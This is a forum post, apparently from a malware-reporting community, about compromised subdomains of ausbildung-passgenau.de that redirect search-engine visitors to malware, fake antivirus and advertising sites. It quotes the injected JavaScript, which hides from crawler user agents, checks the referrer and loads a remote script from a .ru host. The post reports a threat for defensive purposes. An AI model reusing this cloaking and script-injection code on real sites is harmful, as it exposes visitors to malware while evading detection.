Malware Related > Malicious Domains

ausbildung-passgenau.de – a potpourri of badware!

(1/1)

neeklamy:
There’s a few subdomains at ausbildung-passgenau.de that have pages that if visited from a search engine results page (so there’s a certain document referrer), will then redirect to a randomised pick of malware, fake anti-virus and advertising sites.

Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:

* fullfilescenter.ausbildung-passgenau.de
* newfiles2016.ausbildung-passgenau.de
* fastwindows2016.ausbildung-passgenau.deThis Google search results page will show any of the links in action: https://www.google.co.uk/search?q=site:ausbildung-passgenau.de

This is the JavaScript doing the dirty work:


--- Code: ---<script type="text/javascript">
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
var ref = document.referrer;
if (ref.length != 0) {
  if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
  || (ref.indexOf("google.") > 0)
  || ref.indexOf("rambler.") > 0
  || ref.indexOf("bing.") > 0
  || ref.indexOf("mail.") > 0
  || ref.indexOf("yahoo.") > 0
  || ref.indexOf("msn.") > 0
  || ref.indexOf("live.") > 0
  || ref.indexOf("vk.") > 0
  || showme == 'force') {
    document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
  }
}
</script>
--- End code ---

Navigation

[0] Message Index

Go to full version